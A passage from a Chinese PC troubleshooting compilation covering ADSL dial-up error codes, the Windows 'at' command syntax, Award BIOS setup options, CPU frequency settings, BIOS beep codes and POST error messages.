解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问 ，检查网线和 ADSL MODEM

Error 619

问题：与ISP服务器不能建立连接

原因：ADSL ISP服务器故障，ADSL电话线故障

解决：检查ADSL信号灯是否能正确同步。致电ISP询问

Error 621 Cannot open the phone book file

Error 622 Cannot load the phone book file

Error 623 Cannot find the phone book entry

Error 624 Cannot write the phone book file

Error 625 Invalid information found in the phone book

问题：Windows NT或者Windows 2000 Server网络RAS网络组件故障

原因：软件安装问题

解决：卸载所有PPPoE软件，重新安装RAS网络组件和RasPPPoE

Error 630

问题：ADSL MODEM没有没有响应

原因：ADSL电话线故障，ADSL MODEM故障（电源没打开等）

解决：检查ADSL设备

Error 633

问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 638

问题：过了很长时间，无法连接到ISP的ADSL接入服务器

原因：ISP服务器故障；在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码

解决：运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务，以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

Error 645

问题：网卡没有正确响应

原因：网卡故障，或者网卡驱动程序故障

解决：检查网卡，重新安装网卡驱动程序

Error 650

问题：远程计算机没有响应，断开连接

原因：ADSL ISP服务器故障，网卡故障，非正常关机造成网络协议出错

解决：检查ADSL信号灯是否能正确同步，致电ISP询问；检查网卡，删除所有网络组件重新安装 网络。

Error 651

问题：ADSL MODEM报告发生错误

原因：Windows处于安全模式下，或其他错误

解决：出现该错误时，进行重拨，就可以报告出新的具体错误代码

Error 691

问题：输入的用户名和密码不对，无法建立连接

原因：用户名和密码错误，ISP服务器故障

解决：使用正确的用户名和密码，并且使用正确的ISP账号格式(name@service),致电ISP询问。

Error 718

问题：验证用户名时远程计算机超时没有响应，断开连接

原因：ADSL ISP服务器故障

解决：致电ISP询问

Error 720

问题：拨号网络无法协调网络中服务器的协议设置

原因：ADSL ISP服务器故障，非正常关机造成网络协议出错

解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 734

问题：PPP连接控制协议中止

原因：ADSL ISP服务器故障，非正常关机造成网络协议出错

解决：致电ISP询问，删除所有网络组件重新安装网络。

Error 738

问题：服务器不能分配IP地址

原因：ADSL ISP服务器故障，ADSL用户太多超过ISP所能提供的IP地址

解决：致电ISP询问

Error 797

问题：ADSL MODEM连接设备没有找到

原因：ADSL MODEM电源没有打开，网卡和ADSL MODEM的连接线出现问题，软件安装以后相应的协议没有正确邦定，在创立拨号连接时，建立了错误的空连接

解决：检查电源，连接线；检查网络属性，RasPPPoE相关的协议是否正确的安装并正确邦定（相关协议），检查网卡是否出现?号或!号，把它设置为Enable;检查拨号连接的属性，是否连接的设备使用了一个“ISDN channel-Adapter Name(xx)” 的设备，该设备为一个空设备，如果使用了取消它，并选择 正确的PPPoE设备代替它，或者重新创立拨号连接。

at命令的用法

At
列出在指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行“计划”服务才能使用 at 命令。

at [\\computername] [[id] [/delete] | /delete [/yes]]

at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command

参数

无

如果在没有参数的情况下使用，则 at 列出已计划的命令。

\\computername

指定远程计算机。如果省略该参数，命令将安排在本地计算机。

id

指定指派给已计划命令的识别码。

/delete

取消已计划的命令。如果省略了 id，计算机中已计划的命令将被全部取消。

/yes

当删除已计划的事件时，对系统的查询强制进行肯定的回答。

time

指定运行命令的时间。将时间以 24 小时标记（00:00 [午夜] 到 23:59）的方式表示为小时：分钟。

/interactive

允许作业与在作业运行时登录用户的桌面进行交互。

/every:date[,...]

在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行命令。将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su)，或月的一天或多天（使用 1 到 31 的数字）。用逗号分隔多个日期项。如果省略了 date，将假定为该月的当前日期。

/next:date[,...]

在重复出现下一天（例如，下个星期四）时，运行指定命令将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su)，或月的一天或多天（使用 1 到 31 的数字）。用逗号分隔多个日期项。如果省略了 date，将假定为该月的当前日期。

command

指定要运行的 Windows 2000 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的 UNC 符号，而不是远程驱动器号。如果命令不是可执行 (.exe) 文件，必须在命令前加上 cmd /c，例如：

cmd /c dir > c:\test.out

AWARD BIOS设置详解

    AWARD公司是世界最大的BIOS生产厂商之一，其产品也被广泛使用。但由于AWARD BIOS里面的信息都是基于英文且需要用户对相关专业知识的理解相对深入，使得普通用户设置起来感到困难很大。而如果这些设置不当的话，将会影响整台电脑的性能设置是不能正常使用，所以一份详细的设置说明是必要的。下面就介绍一下AWARD BIOS中的有关设置选项的含义和设置方法。

【Standard CMOS Setup】(标准设定)
    在本菜单中，用户可以修改日期、时间、第一主IDE设备(硬盘)和IDE设备(硬盘或CD－ROM)、第二个主IDE设备(硬盘或CD－ROM)和从IDE设备(硬盘或CD－ROM)、软驱A与B、显示系统的类型、什么出错状态要导致系统启动暂停等。主要说明如下：

(1) 用户可以在Type(类型)和Mode(模式)项设置为Auto，使BIOS自动检测硬盘。也可以在主菜单中的【IDE HDD Auto Detection】操作来设置。用户还可以使用User选项，手动设定硬盘的参数。您必须输入柱面数(Cyls)，磁头数(Heads)，写预补偿(Precomp)，磁头着陆区(Landz)，每柱面扇区数(Sectorxs)，工作模式(Mode，内容见下)等几种参数。硬盘大小在上述参数设定后自动产生。

    硬盘工作模式（MODE）的三种选項：

NORMAL模式：传統的标准模式，支持硬盘容量最高至528MB。
LARGE模式：当硬盘容量超过528MB，而硬盘或操作系統不支持LBA模式时，可采用此选项。
LBA 模式(Logical Block Addressing Mode)：适用于硬盘容量超过528M且支持"逻辑区块地址"(LBA)功能（一般都使用此项）

(2) 显示类型可选EGA/VGA(EGA、VGA、SEGA、SVGA、PGA显示适配卡选用)、CGA40(CGA显示卡，40列方式)、CGA80(CGA显示卡，80列方式)、MONO(单色显示方式，包括高分辨率单显卡)等四种，用户应根据情况正确选用。

(3) 暂停的出错状态选项有：
1. AllErrors：BIOS检测到任何错误，系统启动均暂停并且给出出错提示。
2. NoErrors：BIOS检测到任何错误都不使系统启动暂停。
3. All ，But Keyboard：除键盘错误外，BIOS检测到任何其它错误，均暂停系统启动并且给出出错提示。
4. All ，But Disk/Key：除键盘、磁盘错误外，BIOS检测到任何其它错误，均暂停系统启动并且给出出错提示。

【BIOS Features Setup】(功能设定)
    该项用来设置系统配置选项清单，其中有些选项由主板本身设计确定，有些选项用户可以进行修改设定，以改善系统的性能。主要说明如下：
(1) VirusWarning：病毒防御警告(缺省值为Disable)，此功能可防止硬盘的关键磁区及分区被更改，任何试图写入该区的操作將会导致系統死机并形式警告信息。
注意：当安装新的操作系統(如Win95)时，请先取消(disable)此功能，以免因冲突而无法顺利安装。
(2) CPU Internal Cache：缺省为Enable(开启)，它允许系统使用CPU内部的第一级Cache。486、586档次的CPU内部一般都带有Cache，除非当该项设为开启时系统工作不正常，此项一般不要轻易改动。该项若置为Disable(关闭)，将会降低系统的性能。
(3) External Cache：缺省设为Enable，它用来控制主板上的第二级(L2)Cache。根据主板上是否带有Cache，选择该项的设置。
(4) Quick Power On Self Test：缺省设置为Enable，该项主要功能为加速系统上电自测过程，它将跳过一些自测试。使引导过程加快。
(5) IDE HDD Block Mode Sectors：IDE硬盘设定, 預设值为HDDMAX。新式IDE硬盘大多支持一次传输多个磁块的功能。启用(enable)本功能可加快硬盘存取速度。选項有HDDMAX、Disabled、2、4、8、16、及32。
(6) HDD Sequence SCSI/IDE First：IDE/SCSI硬盘开机优先顺序设定，缺省值为IDE。当同时安装SCSI及IDE硬盘时,本选项功能可用来选择以SCSI或IDE硬盘作为开机硬盘。
(7) BootSequence：选择驱动器启动顺序。一般有以下几种启动顺序：
[A，CD-ROM，C]、[CD-ROM，C，A]、[D，A]、[E，A]、[F，A]、[C only]、[A，C]、[C，A]
请注意，某些老式主板并不支持由CD－ROM启动，而现在的新主板增加了更多的启动顺序如LS120，ZIP等。
(8) Swap Floppy Drive：(交换软盘驱动器)缺省设定为Disable。当它Disable时，BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时，BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器，即在DOS下A盘当作B盘用，B盘当作A盘用。
(9) BootUp Floppy Seek：当Enable时，机器启动时BIOS将对软驱进行寻道操作。
(10) Floppy Disk Access Contol：当该项选在R/W状态时，软驱可以读和写，其它状态只能读。
(11) BootUp Numlock Strtus：该选项用来设置小键盘的缺省状态。当设置为ON时，系统启动后，小键盘的缺省为数字状态；设为OFF时，系统启动后，小键盘的状态为箭头状态。
(12) BootUp System Speed：该选项用来确定系统启动时的速度为HIGH还是LOW。
(13) Typematic Rate Setting：该项可选Enable和Disable。当置为Enable时，如果按下键盘上的某个键不放，机器按您重复按下该键对待（重复按键速度可在下面的选项中设置）；当置为Disable时，如果按下键盘上的某个键不放，机器按键入该键一次对待。
(14) Typematic Rate：如果上面的选项置为Enable，那么可以用此选项设定当您按下键盘上的某个键一秒钟，那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
(15) Typematic Delay：如果(13)选项置为Enable，那么可以用此选项设定按下某一个键时，延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000，单位为毫秒。
(16) Security Option：选择System时，每次开机启动时都会提示您输入密码，选择Setup时，仅在进入CMOS Setup时会提示您输入密码（该设置仅在设置了密码的情况下有效）。
(17) PS/2Mouse Function Control：当该项设为Enable，机器提供对于PS/2类型鼠标的支持。否则，选Disable。
(18) Assign PCI IRQ For VGA：选Enable时，机器将自动设定PCI显示卡的IRQ到系统的DRAM中，以提高显示速度和改善系统的性能。
(19) PCI/VGA Palett Snoop：该项用来设置PCI/VGA卡能否与MPEGISA/VESAVGA卡一起用。当PCI/VGA卡与MPEGISA/VESAVGA卡一起用时，该项应设为Enable，否则，设为Disable。
(20) OS/2 Select For DRAM>64MB：该项允许您在OS/2操作系统中，使用64M以上的内存。该项可选为NON－OS2，OS2。
(21) System BIOS Shadow：该选项的缺省设置默认为Enable，当它开启时，系统BIOS将拷贝到系统Dram中，以提高系统的运行速度和改善系统的性能。
(22) Video BIOS Shadow：缺省设定为开启(Enable)，当它开启时，显示卡的BIOS将拷贝到系统DRAM中，以提高显示速度和改善系统的性能。
(23) C8000－CBFFF Shadow/DFFFF Shadow：这些内存区域用来作为其他扩充卡的ROM映射区，一般都设定为禁止(Disable)。如果有某一扩充卡ROM需要映射，则用户应搞清楚该ROM将映射地址和范围，可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的地址空间将占用系统的640K～1024K之间的某一段内存。

【Chipset Features Setup】(芯片组功能设定)
    该项用来设置系统板上芯片的特性。它有以下选项：

注意：此菜单下的选项会因不同主板而不同，如果你不太了解它们的功能，最好设置为缺省值。

(1) ISA Bus Clockfrequency(PCICLK/4)ISA：传输速率率设定，设定值有：PCICLK/3；PCICLK/4。
(2) Auto Configuration：自动状态设定，当设定为Enabled时BIOS依最佳状况状态设定，此时BIOS会自动设定DRAMTiming，所以会有无法修改DRAM的细项时序，我们强烈建议选用Enabled，因为任意改变DRAM的时序可能造成系统不稳或不开机。
(3) Aggressive Mode：高级模式设定，当您想获得较好的效能时，而且系统在非常稳定状态下，可以尝试Enabled此项功能以增加系统效能，不过必须使用较快速DRAM(60ns以下)。
(4) VIDEO BIOS Cacheable：(视频快取功能，缺省值为Disable)，为Enable时，启用快取功能以加快显示速度；为Disable时，取消此功能。
(5) Memory Holeat Address：(缺省值为None)，一些ISA卡会要求使用14-16MB或15-16MB的内存地址空间，若选取14MB-16MB或15MB-16MB，则系統將无法使用这部份的内存空间。您可选取None来取消此功能。
(6) OnboardFDC SwapA：B：(A，B盘互換，缺省值为NoSwap)，当启用(enable)本項功能时则A，B盘互換 。亦即原先A盘被指定成B盘，B盘被指定为A盘。如此一来，您就不需打开机箱互换排线了。
(7) OnboardSerialPort1：(缺省值为3F8H/IRQ4)，设定主机板上串口1的位址及IRQ，选項有：3F8H/IRO4、2F8H/IRQ3、3E8H/IRQ4、2E8H/IRQ10、Disable。
(8) OnboardSerialPort2：(缺省值为2F8H/IRQ3)，设定主机板上串口2的位址及IRQ，选項有：3F8H/IRQ4、2F8H/IRQ8、3E8H/IRQ4、2E8H/IRQ10、Disable。
(9) OnboardParallelPort：(缺省值为378H/IRQ7)，设定主机板上并口的位址及IRQ。
(10) Parallel PortMode：(并口模式，缺省值为ECP+EPP)，并口的操作模式有下列选項：
Normal：一般速度单向运行。
EPP：最高速度双向运行。
ECP：超高速双自运行。
ECP+EPP：ECP与EPP二种模式并用。
(11) ECP DMA Select：(ECP DMA通道选择，缺省值为3)，若在ECP模式下操作时，则提供DMA通道选择，有1，3，Disable三种设定。
(12) UART2 UseInfrared：(缺省值为Disable)，本項功能用来支持紅外线（IR）传输功能。为Enable时，则设定第二序列UART支持红外线传输功能。设为Disable时，则设定第二序列UART支持COM2。
注意：如果没有红外线设备，不要Enable此项，否则会造成不必要的麻烦，例如系统不识别MODEM。
(13) Onboard PCI IDE Enable：(主机板IDE通道设置，缺省值为Both)，用来启用內建IDE通道。选项有：
Primary IDE Channel：仅启动主IDE通道（即第一IDE通道）。
Secondary IDE Channel：仅启动辅IDE通道（即第二IDE通道）。
Both：第一、二IDE通道均启用。
Disable：禁用所有IDE通道。
(14) IDE PIO Mode：这个设置取决于系统硬盘的速度，包括AUTO，0，1，2，3，4五个选项，Mode4硬盘传输速率大于是16.6MB/秒，其它模式的小于这个速率。请不要选择超过硬盘速率的模式，这样会丢失数据。
(15) IDE UDMA(UltraDMA) Mode：Intel430TX以后的芯片提供了Ultra DMA Mode，它可以把传输速率提高到一个新的水准。
(16) IDE0Master/SlaveMode，IDE1Master/SlaveMode：(硬盘时序模式设定，缺省值为Auto)，设为Auto时，系統会自动检查四個IDE 装置的时序模式以确保以最佳速度运行。也可以自行设定时序模式为(0，1，2，3，4)。

【Power Management Setup】（节电功能设定）
    该项为电源管理设定，用来控制主板上的"绿色"功能。该功能定时关闭视频显示和硬盘驱动器以实现节能的效果。具体来说，实现节电的模式有四种：

1、Doze模式：当设定时间一到，CPU时钟变慢，其他设备照常运作；
2、Standby模式：当设定时间一到，硬盘和显示将停止工作，其他设备照常运作；
3、Suspend模式：当设定时间一到，除CPU以外的所有设备都将停止工作；
4、HDD Power Down模式：当设定时间一到，硬盘停止工作，其他设备照常运作。

该菜单项下面的可供选择的内容有以下几种：

(1) Power Management：节电模式的主控项，有四种设定：
Max Saving：(最大节电)在一个较短的系统不活动的周期(Doze、Standby、Suspend、HDDPowerDown四种模式的缺省值均为1分钟)以后，使系统进入节电模式，这种模式节电最大。
MIN Saving：(最小节电)在一段较长的系统不活动的周期在这种情况下，(Doze，Standby，Suspend三种模式的缺省值均为1小时，HDD Power Down模式的缺省值为15分钟)后，使系统进入节电模式。
Disable：关闭节电功能，是缺省设置。
User Defined：(用户定义)允许用户根据自己的需要设定节电的模式。

(2) VideoOFFOption：（显示器关闭设定,缺省值为Susp, Stby->Off），本选项用来设定在何种模式下关闭显示器，选项如下：
1. Susp，Stby->Off：只在待机(Standby)或暫停(Suspend)的省电模式下才关闭显示器。
2. Suspend->Off：只在暫停(Suspend) 模式下才关闭显示器。
3. Alwayson：在任何模式下均不关，显示器照常显示。
4. Allmodes->Off：在任何省电模式下均关闭显示器。

(3) Video Off Method：(视频关闭)该选项可设为V/HSync＋Blank、Dpms、BlankScreen三种，具体如下：

1. V/HSync＋Blank：将关闭显示卡水平与垂直同步信号的输出端口，向视频缓冲区写入空白信号。
2.DPMS(显示电源管理系统)：设定允许BIOS在显示卡有节电功能时，对显示卡进行节能信息的初始化。只有显示卡支持绿色功能时，用户才能使用这些设定。如果没有绿色功能，则应将该行设定为Blank Screen(关掉屏幕)。
3. Blank Screen(关掉屏幕)：当管理关掉显示器屏幕时，缺省设定能通过关闭显示器的垂直和水平扫描以节约更多的电能。没有绿色功能的显示器，缺省设定只能关掉屏幕而不能终止CRT的扫描。
(4) PM Timers(电源管理记时器)：下面的几项分别表示对电源管理超时设置的控制。Doze，StandBy和Suspend Mode项设置分别为该种模式激活前的机器闲置时间，在MAX Saving模式，它每次在一分钟后激活。在MIN Saving模式，它在一小时后激活。
(5) Power Down、Resume Events(进入节电模式和从节电状态中唤醒的事件)：该项下面所列述的事件可以将硬盘设在最低耗电模式，工作、等待和悬挂系统等非活动模式中若有事件发生，如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时，系统自动从电源节电模式下恢复过来。
(6) Soft－OffByPwr－Bttn：ATX机箱的设计不同于传统机箱，按下开关4秒以上才能关闭系统；选择instant－off方式将使ATX机器等同于传统机器，而若置为delay4sec方式，那么您按住开关的时间不足4秒时将使系统进入SuspendMode。

【PNP/PCI Configuration Setup】(即插即用与PCI状态设定)
    该菜单项用来设置即插即用设备和PCI设备的有关属性。

(1) PNP OS Installed：如果软件系统支持Plug－Play，如Win95，可以设置为YES。
(2) Resources ControlledBy：AWARD BIOS支持"即插即用"功能，可以检测到全部支持"即插即用"的设备，这种功能是为类似Win95之类操作系统所设计，可以设置Auto(自动)或Manual(手动)。
(3) Resources Configuration Data：缺省值是Disabled，如果选择Enabled，每次开机时，Extend System Configuration Data(扩展系统设置数据)都会重新设置。
(4) IRQ 3/4/5/7/9/10/11/12/14/15，Assingned To：在缺省状态下，所有的资源除了IRQ3/4，都设计为被PCI设备占用，如果某些ISA卡要占用某资源可以手动设置。

【Load BIOS Defaults】(载入BIOS缺省值)
    当系統安装后不太稳定,则可选用本功能。此时系统将会取消一些高效能的操作模式设定，而处在最保守状态下。因此使用它容易找到主机板的安全值和除去主板的错误。当选择本项时,主画面会出现下列信息：
Load BIOS Defaults（Y/N）?
键入Y并按Enter即可执行本项功能。
注意：本项功能不会影响CMOS內存储的"标准设定"（即【Standard CMOS Setup】项的设置值）

【Load Setup Defaults】（載入SETUP缺省值）
    此为BIOS出厂的设定值。此时系统会以最佳化的模式运行。选择此功能时,主画面会出现下列信息：
Load SETUP Defaults（Y/N）?
键入Y并按Enter即可执行本项功能。

【Supervisor Password And User Password Setup】(管理者与使用者密码设定)
    User Passowrd Setting功能为设定密码。如果要设定此密码，首先应输入当前密码，确定密码后按y，屏幕自动回到主画面。输入User Passowrd可以使用系统，但不能修改CMOS的内容。输入SupervisorPassword可以输入、修改CMOS BIOS的值，Supervisor Password是为了防止他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器，该项功能可以自动读出硬盘参数，并将它们自动记入标准CMOS设定中，它最多可以读出四个IDE硬盘的参数。

【Saveand Exit Setup】將设定值儲存後，离开设置主画面。

【Exit Without Saving】不儲存设定值，直接离开设置主画面。
以上介绍了Award BIOS Setup的常用选项的含义及设置办法。由于每种版本的BIOS具体设置都有所不同，所以上面列举的设置项目，可能少于或多于你系统内的项目，但一般情况下，各种设置都大同小异，触类旁通。另外，由于AMI BIOS的设置同AWARD BIOS基本相同，这里就一一介绍。

免跳线CPU在BIOS中的设置

--------------------------------------------------------------------------------

    目前有不少免跳线主板采用BIOS程序设置CPU工作状态，这无疑是超频族的福音，因为它免去了许多麻烦，给用户带来了方便。如升技BH6、微星6119 W（中文BIOS）等主板，只要将CPU插好，启动计算机，进入BIOS设置程序，就可对CPU参数进行设置，设置的内容包括CPU工作电压、CPU外频和CPU内频等。下面就介绍具体的设置：
(1) CPU Operating Speed：CPU的内核工作速度设定。选项包括：User Define(用户定义)、233（66×3.5）、266（66×4）、300（66×4.5）、333（66×5）、350（100×3.5）、400（100×4）等选项。选择User Define后，CPU外频和倍频由用户在下面的（3）、（4）中自行设置。另外，最新的微星6119（W）的BIOS设置中的CPU Plug & Play选项，可自动检测CPU、设置其工作状态。
(2) Turbo Frequency：CPU外频加速模式设定。当Enable时，CPU的频率被提升2.5％，此项目仅在External Clock（外频）支持Turbo模式时方出现（目前只对100MHz提供支持）。
(3) External Clock：CPU外频设定，包括66、75、83、100、112、124、133MHz等选项。
(4) Multiplier Factor：CPU倍频设定，有2.0、2.5、3.0、3.5、4.0、4.5、5.0、5.5倍等选项
(5) SEL100/66＃ Signal：Signal 100/66信号设定，包括High"（高）和"Low"（低）两个选项。当设置为"High"时，CPU外频为100MHz，设置为"Low"时为66MHz。
注意：有些PⅡ350和PⅡ400运行在100MHz外频时，倍频分别被锁定于3.5和4.0倍频，SEL100/66＃信号设置为"Low"，可解除对倍频的锁定。
(6) AGPCLK/CPUCLK：AGP时钟设定。缺省值为2/3，此时AGP工作频率是CPU外频的2/3，如改设为1/1，则AGP工作频率等于CPU外频。
(7) Speed Error Hold：速度错误处理设定。包括"Disable"和"Enable"选项。默认 为"Disable"。如设置为"Enable"则相当于禁止超频，由系统自动检测CPU，发现设置值与CPU标称值不符时系统拒绝工作。
(8) CPU Power Supply：CPU电压设定。包括"CPU Default"（默认）和"User Define"（用户定义）选项。选择"User Define"时，需在（9）中设置CPU内核电压。
(9) Core Voltage ：CPU内核电压设定。包括1.30V至3.2V间的电压选项。选择项中对电压有一定限制，对2.8V 的 Pentium Ⅱ，电压最高可调至3.2V；对2.0V的Pentium Ⅱ，最高只可调至2.3V。

BB是报警的声音
你可以根据报警声音长短,数目来判断问题出在什么地方
AWARD BIOS响铃声的一般含义是：
1短: 系统正常启动。这是我们每天都能听到的，也表明机器没有任何问题。
2短: 常规错误，请进入CMOS Setup，重新设置不正确的选项。
1长1短: RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。
1长2短: 显示器或显示卡错误。
1长3短: 键盘控制器错误。检查主板。
1长9短: 主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
不断地响（长声）: 内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。
重复短响: 电源问题。
无声音无显示: 电源问题。

AMI BIOS响铃声的一般含义是：
    1. 一短声，内存刷新失败。内存损坏比较严重，恐怕非得更换内存不可。
    2. 二短声，内存奇偶校验错误。可以进入CMOS设置，将内存Parity奇偶校验选项关掉，即设置为Disabled。不过一般来说，内存条有奇偶校验并且在CMOS设置中打开奇偶校验，这对微机系统的稳定性是有好处的。
    3. 三短声，系统基本内存（第1个64Kb）检查失败。更换内存吧。
    4. 四短声，系统时钟出错。维修或更换主板。
    5. 五短声，CPU错误。但未必全是CPU本身的错，也可能是CPU插座或其它什么地方有问题，如果此CPU在其它主板上正常，则肯定错误在于主板。
    6. 六短声，键盘控制器错误。如果是键盘没插上，那好办，插上就行；如果键盘连接正常但有错误提示，则不妨换一个好的键盘试试；否则就是键盘控制芯片或相关的部位有问题了。
    7. 七短声，系统实模式错误，不能切换到保护模式。这也属于主板的错。
    8. 八短声，显存读/写错误。显卡上的存贮芯片可能有损坏的。如果存贮片是可插拔的，只要找出坏片并更换就行，否则显卡需要维修或更换。
    9. 九短声，ROM BIOS检验出错。换块同类型的好BIOS试试，如果证明BIOS有问题，你可以采用重写甚至热插拔的方法试图恢复。
    10. 十短声，寄存器读/写错误。只能是维修或更换主板。
    11. 十一短声，高速缓存错误。
    12. 如果听不到beep响铃声也看不到屏幕显示，首先应该检查一下电源是否接好，在检修时往往容易疏忽，不接上主板电源就开机测试。其次得看看是不是少插了什么部件，如CPU、内存条等。再次，拔掉所有的有疑问的插卡，只留显示卡试试。最后找到主板上清除（clear）CMOS设置的跳线，清除CMOS设置，让BIOS回到出厂时状态。如果显示器或显示卡以及连线都没有问题，CPU和内存也没有问题，经过以上这些步骤后，微机在开机时还是没有显示或响铃声，那就只能是主板的问题了。

POENIX的BIOS报警声（以前的老板上有许多POENIX的，可现在已经被AWARD收购了）
1短 系统启动正常
1短1短1短 系统加电初始化失败
1短1短2短 主板错误
1短1短3短 CMOS或电池失效
1短1短4短 ROM BIOS校验错误
1短2短1短 系统时钟错误
1短2短2短 DMA初始化失败
1短2短3短 DMA页寄存器错误
1短3短1短 RAM刷新错误
1短3短2短 基本内存错误
1短3短3短 基本内存错误
1短4短1短 基本内存地址线错误
1短4短2短 基本内存校验错误
1短4短3短 EISA时序器错误
1短4短4短 EISA NMI口错误
2短1短1短 前64K基本内存错误
3短1短1短 DMA寄存器错误
3短1短2短 主DMA寄存器错误
3短1短3短 主中断处理寄存器错误
3短1短4短 从中断处理寄存器错误
3短2短4短 键盘控制器错误
3短1短3短 主中断处理寄存器错误
3短4短2短 显示错误
3短4短3短 时钟错误
4短2短2短 关机错误
4短2短3短 A20门错误
4短2短4短 保护模式中断错误
4短3短1短 内存错误
4短3短3短 时钟2错误
4短3短4短 时钟错误
4短4短1短 串行口错误
4短4短2短 并行口错误
4短4短3短 数字协处理器错误

开机BIOS语言

开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的BIOS短句的解释，大家可以参考一下。

1.CMOS battery failed

中文：CMOS电池失效。

解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。

2.CMOS check sum error－Defaults loaded

中文：CMOS 执行全部检查时发现错误，要载入系统预设值。

解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！

3.Press ESC to skip memory test

中文：正在进行内存检查，可按ESC键跳过。

解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enabled，储存后重新启动即可。

4.Keyboard error or no keyboard present

中文：键盘错误或者未接键盘。

解释：检查一下键盘的连线是否松动或者损坏。

5.Hard disk install failure

中文：硬盘安装失败。

解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。

6.Secondary slave hard fail

中文：检测从盘失败

解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。

7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)

中文：无法驱动软盘驱动器。

解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。

8.Hard disk(s) diagnosis fail

中文：执行硬盘诊断时发生错误。

解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。

9.Memory test fail

中文：内存检测失败。

解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！

10.Override enable－Defaults loaded

中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。

解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。

11.Press TAB to show POST screen

中文：按TAB键可以切换屏幕显示。

解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。

12.Resuming from disk，Press TAB to show POST screen

中文：从硬盘恢复开机，按TAB显示开机自检画面）。

解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。

13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，Press F1 to continue，DEL to enter SETUP

中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。

解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，然后再加以解决。

BIOS可以被映射

因为BIOS使用的ROM比我们使用的普通内存RAM要慢很多，所以人们就想出在启动后把BIOS的ROM里面的信息拷贝到我们插的内存条（RAM）里来，提高读取速度，而在RAM里的这些BIOS的信息就叫做BIOS影子内存。

BIOS与CMOS区别

      在日常操作和维护计算机的过程中，常常可以听到有关BIOS设置和CMOS设置的一些说法，许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。

    BIOS是什么?

    所谓BIOS，实际上就是微机的基本输入输出系统（Basic Input－Output System），其内容集成在微机主板上的一个ROM芯片上，主要保存着有关微机系统最重要的基本输入输出程序，系统信息设置、开机上电自检程序和系统启动自举程序等。

BIOS的功用

    BIOS ROM芯片不但可以在主板上看到，而且BIOS管理功能如何在很大程度上决定了主板性能是否优越。BIOS管理功能主要包括：

    1． BIOS中断服务程序

